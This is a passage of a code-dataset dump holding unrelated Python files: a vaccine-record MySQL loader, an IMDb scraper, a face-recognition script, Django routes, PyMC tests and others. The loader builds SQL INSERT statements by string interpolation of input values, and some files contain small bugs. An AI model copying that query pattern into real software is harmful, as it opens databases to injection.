row['paciente_id']\r\n estabelecimento_id = row['estabelecimento_id']\r\n grupo_atendimento_id = row['grupo_atendimento_id']\r\n categoria_id = row['categoria_id']\r\n vacina_lote = row['vacina_lote']\r\n fabricante_id = row['fabricante_id']\r\n data_aplicacao = format_date(row['data_aplicacao'])\r\n vacina_id = row['vacina_id']\r\n sistema_origem_id = row['sistema_origem_id']\r\n data_importacao_rnds = format_date(row['data_importacao_rnds'])\r\n tipo_de_dose_id = row['tipo_de_dose_id']\r\n\r\n db.execute(f'''INSERT IGNORE INTO registros(id, paciente_id, estabelecimento_id, grupo_atendimento_id, categoria_id,\r\n vacina_id, fabricante_id, vacina_lote, data_aplicacao, tipo_de_dose_id, sistema_origem_id, data_importacao_rnds) \r\n VALUES ('{id}', '{paciente_id}', '{estabelecimento_id}', '{grupo_atendimento_id}', '{categoria_id}', \r\n '{vacina_id}', '{fabricante_id}', '{vacina_lote}', {data_aplicacao}, '{tipo_de_dose_id}', '{sistema_origem_id}', {data_importacao_rnds})''')\r\n \r\ntry:\r\n # Cria as colunas de chaves estrangeiras e registra os valores em suas respectivas tabelas\r\n print('Processando coluna sexo id')\r\n data['paciente_sexo_id'] = data['paciente_sexo'].apply(add_column_sexo_id)\r\n db.commit()\r\n\r\n print('Processando coluna raca id')\r\n data['paciente_raca_id'] = data.apply(add_column_raca_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna nacionalidade id')\r\n data['paciente_nacionalidade_id'] = data['paciente_nacionalidade'].apply(add_column_nacionalidade_id)\r\n db.commit()\r\n\r\n data['paciente_pais_id'] = data.apply(add_column_pais_id, axis=1)\r\n data['paciente_estado_id'] = data['paciente_estado'].apply(add_column_estado_id)\r\n db.commit()\r\n\r\n print('Processando coluna municipio id')\r\n data['paciente_municipio_id'] = data.apply(add_column_municipio_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna estabelecimento estado id')\r\n data['estabelecimento_estado_id'] = data['estabelecimento_estado'].apply(add_column_estado_id)\r\n db.commit()\r\n\r\n print('Processando coluna estabelecimento municipio id')\r\n data['estabelecimento_municipio_id'] = data.apply(add_column_municipio_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna estabelecimento id')\r\n data['estabelecimento_id'] = data.apply(add_column_estabelecimento_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna categoria id')\r\n data['categoria_id'] = 
data.apply(add_column_categoria_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna vacina id')\r\n data['vacina_id'] = data.apply(add_column_vacina_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna atendimento id')\r\n data['grupo_atendimento_id'] = data.apply(add_column_grupo_de_atendimento_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando sistema origem id')\r\n data['sistema_origem_id'] = data['sistema_origem'].apply(add_column_sistema_id)\r\n db.commit()\r\n\r\n print('Processando coluna fabricante id')\r\n data['fabricante_id'] = data.apply(add_column_fabricante_id, axis=1)\r\n db.commit()\r\n\r\n print('Processando coluna tipo de dose id')\r\n data['tipo_de_dose_id'] = data['descricao_dose'].apply(add_column_tipo_de_dose_id)\r\n db.commit()\r\n\r\n print('Fazendo registro dos dados')\r\n # Registra os dados principais\r\n chunk_size = 5000\r\n chunk_index = 0\r\n chunk_total = math.ceil(data.shape[0] / chunk_size)\r\n while(True):\r\n chunk = data[chunk_index*chunk_size:chunk_index*chunk_size + chunk_size]\r\n print(f'Processando pacientes, chunk {chunk_index}/{chunk_total}')\r\n if(chunk.size == 0):\r\n break\r\n\r\n chunk.apply(register_pacientes, axis=1)\r\n db.commit()\r\n chunk_index += 1\r\n\r\n chunk_size = 5000\r\n chunk_index = 0\r\n chunk_total = math.ceil(data.shape[0] / chunk_size)\r\n while(True):\r\n chunk = data[chunk_index*chunk_size:chunk_index*chunk_size + chunk_size]\r\n print(f'Processando dados principais, chunk {chunk_index}/{chunk_total}')\r\n if(chunk.size == 0):\r\n break\r\n\r\n chunk.apply(register_data, axis=1)\r\n db.commit()\r\n chunk_index += 1\r\n \r\nexcept Exception as e:\r\n print('Error message:', e)\r\n traceback.print_exc()\r\n db.rollback()\r\n\r\n\r\nend = time.time()\r\nprint('Duration in secs:', end - start)","sub_path":"normalizer_modified.py","file_name":"normalizer_modified.py","file_ext":"py","file_size_in_byte":19004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"91769523","text":"import re\nimport scrapy\nfrom Imdb.items import MovieItem, CastItem\n\nclass ImdbSpider(scrapy.Spider):\n\tname = \"imdb\"\n\tallow_domains = [\"imdb.com\"]\n\tstart_urls = [\n\t\t# Top 250 list of English movies\n\t\t\"http://www.imdb.com/chart/top?ref_=nv_ch_250_4\",\n\t]\n\n\t# parsing the top 250 IMDB page and doing the callback request to each title link\n\tdef parse(self, response):\n\t\t# self.wanted_num = 10\n\t\tfor sel in response.xpath('//table[@class=\"chart full-width\"]/tbody/tr'):\n\t\t\titem = MovieItem()\n\t\t\titem['title'] = sel.xpath('td[2]/a/text()').extract_first()\n\t\t\titem['rating'] = sel.xpath('td[3]/strong/text()').extract_first()\n\t\t\titem['ranking'] = sel.xpath('td[1]/span[1]/@data-value').extract_first()\n\t\t\titem['release_year'] = sel.xpath('td[2]/span/text()').re(r'\\d+')[0]\n\t\t\tmain_page_url = sel.xpath('td[2]/a/@href').extract_first()\n\t\t\titem['main_page_url'] = response.urljoin(main_page_url)\n\n\t\t\trequest = scrapy.Request(item['main_page_url'], callback=self.parse_movie_details)\n\t\t\trequest.meta['item'] = item\n\n\t\t\t# if int(item['ranking']) > self.wanted_num:\n\t\t\t# \treturn\n\t\t\tyield request\t \n\n\tdef parse_movie_details(self, response):\n\t\titem = response.meta['item']\n\t\titem = self.get_basic_film_info(item, response)\n\t\titem = self.get_technical_details(item, response)\n\t\titem = self.get_cast_member_info(item, response)\n\t\treturn item\t\t\n\n\tdef get_basic_film_info(self, item, 
response):\n\t\titem['director'] = response.xpath('//div/span[@itemprop=\"director\"]/a/span/text()').extract_first()\n\t\titem['writers'] = response.xpath('//div/span[@itemprop=\"creator\"]/a/span/text()').extract_first()\n\t\titem['sinopsis'] = response.xpath('//div[@itemprop=\"description\"]/text()').extract_first()\n\t\titem['genres'] = response.xpath('//div[@itemprop=\"genre\"]/a/text()').extract()\n\t\titem['mppa_rating'] = response.xpath('//span[@item=\"contentRating\"]/text()').extract_first()\n\t\treturn item\n\n\tdef get_cast_member_info(self, item, response):\n\t\titem['cast_members']\t= []\n\t\tfor index, cast_member in enumerate(response.xpath('//div[@id=\"titleCast\"]/table/tr')):\n\t\t\tif index == 0:\n\t\t\t\tcontinue\n\n\t\t\tcast = CastItem()\n\t\t\tcast['ranking'] = index\n\t\t\tcast['actor_name'] = self.get_index(cast_member.xpath('td[2]/a/text()').extract())\n\t\t\tcast['character_name'] = self.get_index(cast_member.xpath('td[4]/div/a/text()').extract())\n\t\t\titem['cast_members'].append(cast)\n\n\t\treturn item\n\t\t\n\tdef get_technical_details(self, item, response):\n\t\t# set default value for the item without values\n\t\tfor index, details in enumerate(response.xpath('//*[@id=\"titleDetails\"]/div')):\n\t\t\ttitleDetails = details.xpath('h4/text()').extract()\n\t\t\tif titleDetails:\n\t\t\t\titem = self.map_film_details(response, self.get_index(titleDetails), item, index)\n\n\t\treturn item\t\t\n\n\tdef map_film_details(self, response, titleDetails, item, index):\n\n\t\tindex += 1\n\n\t\tif titleDetails:\n\t\t\tif 'Language' in titleDetails:\n\t\t\t\titem['language'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Country' in titleDetails:\n\t\t\t\titem['country'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Budget' in titleDetails:\n\t\t\t\titem['budget'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Gross' in titleDetails:\n\t\t\t\titem['gross_profit'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Opening Weekend' in titleDetails:\n\t\t\t\titem['opening_weekend_profit'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Sound Mix' in titleDetails:\n\t\t\t\titem['sound_mix'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Color' in titleDetails:\n\t\t\t\titem['color'] = self.get_index(self.get_title_details(response, index))\n\t\t\telif 'Aspect Ratio' in titleDetails:\n\t\t\t\titem['aspect_ratio'] = self.get_index(self.get_title_details(response, index), 1)\n\t\t\telif 'Runtime:' in titleDetails:\n\t\t\t\titem['runtime'] = self.get_index(self.get_title_details(response, index))\n\t\treturn item\n\n\tdef get_title_details(self, response, index):\n\t\t\treturn response.xpath('//div[@id=\"titleDetails\"]/div['+str(index)+']/a/text()').extract()\t\n\n\tdef get_index(self, item, index=0):\n\t\tif item:\n\t\t\treturn item[index]\n\t\telse:\n\t\t\treturn item\t\t\t\t\t\n\n\t\n\n","sub_path":"Imdb/Imdb/spiders/imdb_spider.py","file_name":"imdb_spider.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102956792","text":"import ConfigParser\nimport time\nimport os\nimport math\n\nconfig = ConfigParser.ConfigParser()\nconfig.read('pfl_config1.ini')\n\nbuckets = config.get('Client','Buckets')\n\nap = 65536\n\nstripe = [0] * (int(buckets) + 1)\nextents = [0] * (int(buckets) + 1)\n\nfor i in range(int(buckets)):\n\tbucketID = 'Bucket_' + 
str(i+1)\n\textent = config.get(bucketID, 'Extent')\n\tstripe[i + 1] = config.get(bucketID, 'Stripe')\n\tif extent[-1] == 'K':\n\t\textents[i + 1] = int(extent[:-1])*1024\n\telif extent[-1] == 'M':\n\t\textents[i + 1] = int(extent[:-1])*1024*1024\n\telif extent[-1] == 'G':\n\t\textents[i + 1] = int(extent[:-1])*1024*1024*1024\n\telif extent[-1] == 'T':\n\t\textents[i + 1] = int(extent[:-1])*1024*1024*1024*1024\n\telif extent == '-1':\n\t\textents[i + 1] = -1\n\telse:\n\t\textents[i + 1] = int(extent[:-1])\n\n#print stripe\n#print extents\n\npath = os.path.dirname(os.path.realpath(__file__))\n#print path\n\nfilename_trace = 'traces_ior_pfl_SSF.txt'\nfilename_presql = 'presql.txt'\n\ndestfile_trace = path + '/' + filename_trace\ndestfile_presql = path + '/' + filename_presql\n\nif os.path.isfile(destfile_presql):\n\tos.remove(destfile_presql)\n\nf_presql = open(destfile_presql, 'a+')\n\nf_presql.write('name,size,lcmeID,eStart,eEnd,stripes,stripesize,ranks,ost,inUse\\n')\n\nwith open(destfile_trace) as f_trace:\n\tnext(f_trace)\n\tfor line in f_trace:\n\t\tdif = line.split(',')\n\t\tfor i in range(int(buckets)):\n\t\t\tname = dif[0]\n\t\t\tsize = dif[1]\n\t\t\tlcmeID = i + 1\n\t\t\teStart = extents[i]\n\t\t\teEnd = extents[i+1]\n\t\t\tif eEnd == -1:\n\t\t\t\teEnd = size\n\t\t\tstripes = stripe[i+1]\n\t\t\twritebytes = int(eEnd) - int(eStart)\n\t\t\t#if stripesize < 0:\n\t\t\t\t#stripesize = 0\n\t\t\t#print "Size: ",size\n\t\t\t#print eStart\n\t\t\t#print eEnd\n\t\t\tif int(eStart) > int(size):\n\t\t\t\t#print "start>size"\n\t\t\t\tstripesize = 0\n\t\t\t\tif int(eEnd) < int(eStart):\n\t\t\t\t\teEnd = 34359738368\n\t\t\tif int(eStart) < int(size) and int(eEnd) > int(size):\n\t\t\t\t#print "1"\n\t\t\t\t#eEnd = size\n\t\t\t\twritebytes = int(size) - int(eStart)\n\t\t\t#print writebytes\n\t\t\tn = math.ceil(float(writebytes)/float(ap*2*int(stripes)))\n\t\t\tstripesize = ap * 2 * n\n\t\t\tif stripesize < 0:\n\t\t\t\tstripesize = 0\n\t\t\tranks = str(dif[2]).strip()\n\t\t\tost = -1\n\t\t\tinUse = 0\n\t\t\tmsg = str(name) + ',' + str(size) + ',' + str(lcmeID) + ',' + str(eStart) + ',' + str(eEnd) + ',' + str(stripes) + ',' + str(int(stripesize)) + ',' + str(ranks) + ',' + str(ost) + ',' + str(inUse)\n\t\t\t#msg = msg.replace('\\n','')\n\t\t\tf_presql.write(msg+'\\n')\n\nf_presql.close()\n","sub_path":"PFL_Arnab/Client/configToTxt.py","file_name":"configToTxt.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"258904531","text":"from collections import deque\n\nt = int(input())\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\n\ndef bfs(graph, start, visited):\n    if visited[start[0]][start[1]] != 0: # not visited yet\n        queue = deque([start])\n        visited[start[0]][start[1]] = 0\n        while queue:\n            v = queue.popleft()\n            for i in graph[v]:\n                if visited[i[0]][i[1]] != 0:\n                    queue.append(i)\n                    visited[i[0]][i[1]] = 0\n        return True\n    return False\n    \nfor _ in range(t):\n    m, n, k = map(int, input().split())\n    loc = [[0]*m for _ in range(n)] # positions of the cabbages\n    for _ in range(k):\n        x, y = map(int, input().split())\n        loc[y][x] = 1\n    graph = {}\n    for i in range(n):\n        for j in range(m):\n            if loc[i][j] == True:\n                graph[(i,j)] = []\n                for d in range(4):\n                    if 0 <= i+dy[d] <= n-1 and 0 <= j+dx[d] <= m-1:\n                        if loc[i+dy[d]][j+dx[d]] == True:\n                            graph[(i,j)].append((i+dy[d],j+dx[d]))\n    result = 0\n    for i in range(n):\n        for j in range(m):\n            if bfs(graph, (i,j), loc) == True:\n                result += 1\n    
print(result)","sub_path":"BOJ/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"545319047","text":"#/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n'My First Module File'\r\n__author__ = \"Donald.Zhuang\"\r\n\r\nimport sys\r\n\r\ndef hello_world():\r\n args = sys.argv\r\n if len(args) == 1:\r\n print(\"Hello world!\")\r\n elif len(args) == 2:\r\n print(\"Hello %s\", args(1))\r\n else:\r\n print(\"Too Many Parameters!\")\r\n\r\nif __name__ == '__main__':\r\n hello_world()","sub_path":"base/partitial.py","file_name":"partitial.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"337166740","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 13 18:01:27 2018\r\n\r\n@author: USER\r\n\"\"\"\r\n\r\n# Codes are free to use. Do whatever you want\r\n\r\nfrom __future__ import absolute_import\r\n\r\n\"\"\"Read raw data\"\"\"\r\n\r\n####################### LIBRARY #############################\r\n\r\n# exceptions library\r\nfrom exceptions import (Illegal_Filename_Exception, \r\n Data_Format_Exception)\r\n\r\n# Python stdlib imports\r\nimport datetime\r\nimport re\r\nimport os\r\n\r\n# data processing library\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# pyrod library\r\n\r\n####################### CONSTANT ############################\r\n\r\n# constant \r\n#regex of raw_data, parameters, sheet names\r\n\r\nRAW_DATA_DAT = re.compile('^\\d\\dL\\.dat$')\r\nRAW_DATA_XLSX = re.compile('^\\d\\dL\\.xlsx$')\r\n\r\n####################### FUNCTIONS ###########################\r\n\r\n\r\n \r\n######################## CLASSS #############################\r\n\r\nclass initialization_rhkl(object):\r\n \r\n def __init__(self,\r\n raw_data = '00L.xlsx'):\r\n \r\n self.raw_data = raw_data\r\n self.path = os.path.abspath(os.path.dirname(raw_data)) + '/' + raw_data\r\n \r\n # check raw_data\r\n self.check_raw_data_dat = 1\r\n self.check_raw_data_xlsx = 1\r\n \r\n # check file names\r\n # raw_data and parameters\r\n def _check_filename(self):\r\n \r\n \"\"\"legal names: xxL.xlsx or xxL.dat; parameters_xxx--.xlsx\"\"\"\r\n \r\n # check raw data, .dat or xlsx\r\n self.check_raw_data_dat = RAW_DATA_DAT.match(self.raw_data)\r\n self.check_raw_data_xlsx = RAW_DATA_XLSX.match(self.raw_data)\r\n \r\n if not (self.check_raw_data_dat or self.check_raw_data_xlsx):\r\n error = 'raw data name is illegal.appropriate file name: xxL.dat or xxL.xlsx'\r\n raise Illegal_Filename_Exception(error)\r\n \r\n\r\n def _read_rhkl(self, density = 100):\r\n \r\n \"\"\"Read origin data.default reconstruct data density is 100\"\"\"\r\n \r\n try:\r\n # if data is origin data form from APS .dat\r\n if 'dat' in self.raw_data:\r\n \r\n # open od-origin data\r\n raw_data = open(self.path)\r\n \r\n qz = []\r\n ie = []\r\n \r\n # read in line form\r\n for line in raw_data:\r\n \r\n lst = line.split()\r\n \r\n # float data\r\n qz.append(float(lst[0]))\r\n ie.append(float(lst[1]))\r\n \r\n # if data is xlsx, maybe modulated\r\n elif 'xlsx' in self.raw_data:\r\n \r\n # read excel data as matrix\r\n rd = pd.read_excel(self.path).as_matrix()\r\n \r\n qz = rd[:,0].tolist()\r\n ie = rd[:,1].tolist()\r\n \r\n except Data_Format_Exception:\r\n print('Data format of raw data is illegal')\r\n \r\n # interpolant data density. 
ensure the integrality of bragg peak\r\n # qs--q start\r\n qs = qz[ 0]\r\n # qe--q end\r\n qe = qz[-1]\r\n \r\n # interpolant data with default intensity 100 \r\n iq0 = 0.0\r\n iqs = round(qs*100)/100\r\n iqe = round(qe*100)/100\r\n \r\n iq= np.linspace(iq0, \r\n iqe,\r\n (iqe-iq0)/0.01+1)\r\n \r\n intensity = np.interp(iq,qz,ie)\r\n # the signal between iq0 and iqs is not detected\r\n intensity[0: int(iqs/0.001)] = 0\r\n \r\n return iq, intensity","sub_path":"read/read_raw_data.py","file_name":"read_raw_data.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460853045","text":"#capturing images for training for recognizers\n#stores them in data folder\n\nimport cv2, sys, os\nimport numpy as np\n\n\n#all the images will be in datasets folder\ndatasets = 'images'\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ncascade_dir = os.path.join(BASE_DIR, \"data\")\nface_cascade = cv2.CascadeClassifier(cascade_dir + \"/\"+\"haarcascade_frontalface_alt2.xml\")\n\nwebcam = cv2.VideoCapture(0)\n\n### FUNCTION: FOR FETCHING THE IMAGES AND TRAINING THE MODEL\ndef capture_train():\n\t#sub-folder for storing specific images\n\tsub_folder=raw_input(\"Enter your name: \")\n\tpath = os.path.join(datasets, sub_folder)\n\tif not os.path.isdir(path):\n\t\tos.mkdir(path)\n\n\t#defining sizes of images\n\t(width, height) = (130, 100)\n\n\n\t#the program loops unitil it has caputred 30 images\n\tcount = 1\n\tprint('Taking images for training...')\n\twhile(count<100):\n\t\t(_, img) = webcam.read()\n\t\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tfaces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)\n\t\t\n\t\tfor(x,y,w,h) in faces:\n\t\t\tcv2.rectangle(img, (x,y), (x+w, y+h), (0,0,255), 2)\n\t\t\tcv2.putText(img, 'Capturing Photo & Training', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n\t\t\tface = gray[y:y+h, x:x+w]\n\t\t\tface_resize = cv2.resize(face, (width, height))\n\t\t\tcv2.imwrite('%s/% s.png' %(path, count), face_resize)\n\t\tcount += 1\n\n\t\tcv2.imshow('OpenCV', img)\n\t\tkey = cv2.waitKey(10)\n\t\tif key == 27:\n\t\t\tbreak\n\n### FUNCTION: FOR RECOGNIGING THE FACE\ndef face_recognizer():\n\t# Part 1: Create fisherRecognizer \n\tprint('Recognizing Face Please Be in sufficient Lights...')\n\t# Create a list of images and a list of corresponding names \n\t(images, lables, names, id_) = ([], [], {}, 0) \n\tfor (subdirs, dirs, files) in os.walk(datasets): \n\t for subdir in dirs: \n\t names[id_] = subdir \n\t subjectpath = os.path.join(datasets, subdir) \n\t for filename in os.listdir(subjectpath): \n\t path = subjectpath + '/' + filename \n\t # print(path)\n\t lable = id_\n\t images.append(cv2.imread(path, 0)) \n\t lables.append(int(lable)) \n\t id_ += 1\n\t(width, height) = (130, 100) \n\t \n\t# Create a Numpy array from the two lists above \n\t(images, lables) = [np.array(lis) for lis in [images, lables]] \n\t \n\t# OpenCV trains a model from the images \n\t# NOTE FOR OpenCV2: remove '.face' \n\tmodel = cv2.face.LBPHFaceRecognizer_create() \n\tmodel.train(images, lables) \n\t \n\twhile True: \n\t (_, img) = webcam.read() \n\t gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \n\t faces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5) \n\t for (x, y, w, h) in faces: \n\t cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2) \n\t face = gray[y:y + h, x:x + w] \n\t face_resize = cv2.resize(face, (width, height)) \n\t # Try to recognize the 
face \n\t prediction = model.predict(face_resize) \n\t cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 3) \n\t \n\t if prediction[1]<500: \n\t \tcv2.putText(img, '% s - %.0f' % (names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0)) \n\t else:\n\t \tcv2.putText(img, 'not recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0)) \n\t \n\t cv2.imshow('OpenCV', img)\n\t if cv2.waitKey(20) & 0xFF == ord('q'):\n\t \tbreak\n\n\t# When everything done, release the capture\n\twebcam.release()\n\tcv2.destroyAllWindows()\n\ndef runOpenface():\n\t## RUN THE OPENFACE:\n\tos.system('/home/varat/OpenFace/build/bin/FeatureExtraction -verbose -device /dev/video0')\n\t\nif __name__ == '__main__':\n\tcase = raw_input(\"Choose? 1:Caputure Photo and Train Model; 2:Face Recognition; 3:Run OpenFace? \")\n\tprint('Please press\"q\" to close the webcam')\n\tprint('It is build with Python 2 version')\n\tif (case == '1'):\n\t\tcapture_train()\n\tif (case == '2'):\n\t\tface_recognizer()\n\tif (case == '3'):\n\t\trunOpenface();\n\telse:\n\t\tprint('Choose one of the choice: 0, 1 or 2')\n","sub_path":"facialDetect.py","file_name":"facialDetect.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"170052364","text":"################################################################################\n# Copyright 2015 Martin Grap\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n## @package make_glade_header C++ code generator written in python3 that encapsulates the glade\n# file in a C++ header file\n# \n# Code generator that transforms the glade file needed by this software into a base64 encoded\n# string that can be included through a header file. This saves us from the trouble of locating the \n# rotor_dialog_2.ui file during runtime. \n# usage: make_glade_header.py glade_file_name output_file_name\n#\n# \\file make_glade_header.py\n# \\brief Code generator that transforms the glade file needed by this software into a base64 encoded\n# string that can be included through a header file. This saves us from the trouble of locating the \n# rotor_dialog_2.ui file during runtime.\n\nimport base64\nimport sys\n\nLINE_LENGTH = 72\n\ndef make_glade_data(file_name, file_name_out):\n f = open(file_name, 'rb')\n raw = f.read()\n f.close()\n \n b64data = base64.standard_b64encode(raw).decode()\n \n f = open(file_name_out, 'w')\n f.write('#include\\r\\n\\r\\n')\n f.write('//base64 encoded glade data. 
base64 encoding is less efficient but also less error prone\\r\\n')\n f.write('//than quoting all the special characters in the XML input \\r\\n') \n f.write('static const string gladedata(\"\\\\\\r\\n')\n \n chunk_start = 0;\n \n while chunk_start < len(b64data):\n\n block_length = LINE_LENGTH\n end_char = '\\\\' \n if (len(b64data) - chunk_start) < LINE_LENGTH:\n block_length = len(b64data) - chunk_start\n\n f.write(b64data[chunk_start:chunk_start + block_length] + end_char + '\\r\\n')\n chunk_start += block_length\n \n f.write('\");\\r\\n')\n f.close()\n\n\nif len(sys.argv) < 3:\n print(\"usage: make_glade_header.py \")\n sys.exit()\n\nmake_glade_data(sys.argv[1], sys.argv[2])\n","sub_path":"make_glade_header.py","file_name":"make_glade_header.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"636503058","text":"from django.urls import path\nfrom .views import (IndexTemplateView, AboutTemplateView, ServiceTemplateView,\n CasesTemplateView,BlogTemplateView, ContactTemplateView, SingelBlogPost,\n CategoryBaseWork, search, TermsConditionView, PrivacyAndPolicyView, RefundPolicyView, ServicePriceDetail)\n\nurlpatterns = [\n path('', IndexTemplateView, name=\"index\"),\n path('about', AboutTemplateView.as_view(), name=\"about\"),\n path('service', ServiceTemplateView.as_view(), name=\"service\"),\n path('cases', CasesTemplateView.as_view(), name=\"cases\"),\n path('blog', BlogTemplateView.as_view(), name=\"blog\"),\n path('contact', ContactTemplateView, name=\"contact\"),\n path('post/', SingelBlogPost.as_view(), name=\"blog-singel\"),\n path('service-page/', CategoryBaseWork, name=\"service_item\"),\n path('search', search, name=\"search\"),\n path('terms-and-condition', TermsConditionView.as_view(), name=\"terms_condition_view\"),\n path('privacy-and-policy', PrivacyAndPolicyView.as_view(), name=\"privacy_and_policy\"),\n path('refound-policy', RefundPolicyView.as_view(), name=\"refound_policy\"),\n path('order/', ServicePriceDetail, name=\"order\")\n]\n","sub_path":"base_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"420836975","text":"# Copyright 2020 The PyMC Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport re\nimport unittest.mock as mock\n\nfrom contextlib import ExitStack as does_not_raise\nfrom typing import Tuple\n\nimport aesara\nimport aesara.tensor as at\nimport numpy as np\nimport numpy.testing as npt\nimport pytest\nimport scipy.special\nimport xarray as xr\n\nfrom aesara import Mode, shared\nfrom aesara.compile import SharedVariable\nfrom arviz import InferenceData\nfrom arviz import from_dict as az_from_dict\nfrom arviz.tests.helpers import check_multiple_attrs\nfrom scipy import stats\n\nimport pymc as pm\n\nfrom pymc.aesaraf import compile_pymc\nfrom pymc.backends.base import MultiTrace\nfrom pymc.backends.ndarray import 
NDArray\nfrom pymc.exceptions import IncorrectArgumentsError, SamplingError\nfrom pymc.sampling import _get_seeds_per_chain, compile_forward_sampling_function\nfrom pymc.tests.helpers import SeededTest, fast_unstable_sampling_mode\nfrom pymc.tests.models import simple_init\n\n\nclass TestInitNuts(SeededTest):\n def setup_method(self):\n super().setup_method()\n self.model, self.start, self.step, _ = simple_init()\n\n def test_checks_seeds_kwarg(self):\n with self.model:\n with pytest.raises(ValueError, match=\"Number of seeds\"):\n pm.sampling.init_nuts(chains=2, random_seed=[1])\n\n\nclass TestSample(SeededTest):\n def setup_method(self):\n super().setup_method()\n self.model, self.start, self.step, _ = simple_init()\n\n @pytest.mark.parametrize(\"init\", (\"jitter+adapt_diag\", \"advi\", \"map\"))\n @pytest.mark.parametrize(\"cores\", (1, 2))\n @pytest.mark.parametrize(\n \"chains, seeds\",\n [\n (1, None),\n (1, 1),\n (1, [1]),\n (2, None),\n (2, 1),\n (2, [1, 2]),\n ],\n )\n def test_random_seed(self, chains, seeds, cores, init):\n with pm.Model():\n x = pm.Normal(\"x\", 0, 10, initval=\"prior\")\n tr1 = pm.sample(\n chains=chains,\n random_seed=seeds,\n cores=cores,\n init=init,\n tune=0,\n draws=10,\n return_inferencedata=False,\n compute_convergence_checks=False,\n )\n tr2 = pm.sample(\n chains=chains,\n random_seed=seeds,\n cores=cores,\n init=init,\n tune=0,\n draws=10,\n return_inferencedata=False,\n compute_convergence_checks=False,\n )\n\n allequal = np.all(tr1[\"x\"] == tr2[\"x\"])\n if seeds is None:\n assert not allequal\n else:\n assert allequal\n\n @mock.patch(\"numpy.random.seed\")\n def test_default_sample_does_not_set_global_seed(self, mocked_seed):\n # Test that when random_seed is None, `np.random.seed` is not called in the main\n # process. 
Ideally it would never be called, but PyMC step samplers still rely\n # on global seeding for reproducible behavior.\n kwargs = dict(tune=2, draws=2, random_seed=None)\n with self.model:\n pm.sample(chains=1, **kwargs)\n pm.sample(chains=2, cores=1, **kwargs)\n pm.sample(chains=2, cores=2, **kwargs)\n mocked_seed.assert_not_called()\n\n def test_sample_does_not_rely_on_external_global_seeding(self):\n # Tests that sampling does not depend on exertenal global seeding\n kwargs = dict(\n tune=2,\n draws=20,\n random_seed=None,\n return_inferencedata=False,\n )\n with self.model:\n np.random.seed(1)\n idata11 = pm.sample(chains=1, **kwargs)\n np.random.seed(1)\n idata12 = pm.sample(chains=2, cores=1, **kwargs)\n np.random.seed(1)\n idata13 = pm.sample(chains=2, cores=2, **kwargs)\n\n np.random.seed(1)\n idata21 = pm.sample(chains=1, **kwargs)\n np.random.seed(1)\n idata22 = pm.sample(chains=2, cores=1, **kwargs)\n np.random.seed(1)\n idata23 = pm.sample(chains=2, cores=2, **kwargs)\n\n assert np.all(idata11[\"x\"] != idata21[\"x\"])\n assert 